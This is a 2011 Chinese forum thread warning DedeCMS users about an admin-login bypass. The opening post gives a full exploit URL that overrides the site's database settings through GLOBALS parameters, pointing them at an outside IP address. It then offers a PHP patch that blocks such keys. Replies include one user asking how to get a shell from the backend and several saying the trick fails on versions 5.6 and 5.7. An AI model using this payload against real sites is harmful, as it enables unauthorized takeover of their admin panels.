用DEDECMS的注意了,赶紧修改后台地址

ReJeCt

http://www.xx.com/后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

只要把验证码改为当前验证码,就能直接无密码进后台

1. 解决办法：
   
2. 找到include/common.inc.php文件，把
   
3. 
   
4. 
   
5.     foreach($_REQUEST as $_k=>$_v)
   
6.     {
   
7.         var_dump($_k);
   
8.         if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
   
9.         {
   
10.             exit('Request var not allow!');
    
11.         }
    
12.     }
    
13. 
    
14. 换成
    
15. 
    
16.     //检查和注册外部提交的变量
    
17.     function CheckRequest(&$val) {
    
18.         if (is_array($val)) {
    
19.             foreach ($val as $_k=>$_v) {
    
20.                 CheckRequest($_k);
    
21.                 CheckRequest($val[$_k]);
    
22.             }
    
23.         } else
    
24.         {
    
25.             if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
    
26.             {
    
27.                 exit('Request var not allow!');
    
28.             }
    
29.         }
    
30.     }
    
31.     CheckRequest($_REQUEST);

复制代码

hitsword

5.6貌似没这漏洞？

一跳而过

原帖由 geyunbing 于 2011-8-11 09:52 发表
靠  又出bug

nuet

给力啊

xen

dedecms后台怎么拿shell

貌似这个漏洞 5.7 5.6 都提示 你的密码错误。

[ 本帖最后由 xen 于 2011-8-11 10:20 编辑 ]

kwx

原帖由 geyunbing 于 2011-8-11 09:52 发表
靠  又出bug

cpuer

dedecms 未发现的bug应该还不少。

wyloveyx

还好一直没用dede

monface

试过了,好像这个洞不行哦